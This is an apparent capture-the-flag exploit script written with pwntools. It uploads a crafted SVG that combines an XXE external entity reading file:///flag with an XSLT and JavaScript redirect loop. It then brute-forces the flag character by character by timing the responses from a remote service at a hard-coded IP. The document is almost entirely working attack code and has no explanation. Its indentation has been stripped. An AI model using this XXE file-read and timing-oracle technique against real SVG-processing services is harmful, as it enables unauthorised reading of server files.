import time
from pwn import *
chars = "{}_-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
svg='''<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="?#"?>
<!DOCTYPE div [
<!ENTITY flag_p "file:///flag">
<!ENTITY flag_c SYSTEM "file:///flag">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:copy-of select="document('')"/>
<body xmlns="http://www.w3.org/1999/xhtml">
<div style="display:none"><p class="&flag_p;">&flag_c;</p></div>
<script>document.querySelectorAll('p').forEach(p => {if(p.innerHTML.slice(0,flag_length)=="flag_test"){while(true){window.location.href="/test.svg"}}});</script>
</body>
</xsl:template>
</xsl:stylesheet>
'''
def send(flag, i):
p = remote("202.112.238.82", 23379)
p.recvuntil(b"File name: ")
p.sendline("test.svg".encode())
p.recvuntil(b"Input your file:\n")
p.send((svg.replace("flag_test",flag).replace("flag_length",str(i))).encode())
p.sendline(b"EOF")
start =time.perf_counter()
p.recvuntil(b"\n")
p.recvuntil(b"\n")
p.recvuntil(b"\n")
end = time.perf_counter()
p.close()
print(flag+":"+str(end-start))
return end-start
i=6
flag='TPCTF'
while(1):
for ch in chars:
flag=flag+ch
if(send(flag,i)<10):
flag=flag[0:len(flag)-1]
else:
i+=1
break
print("Valid_Now: "+flag)
|
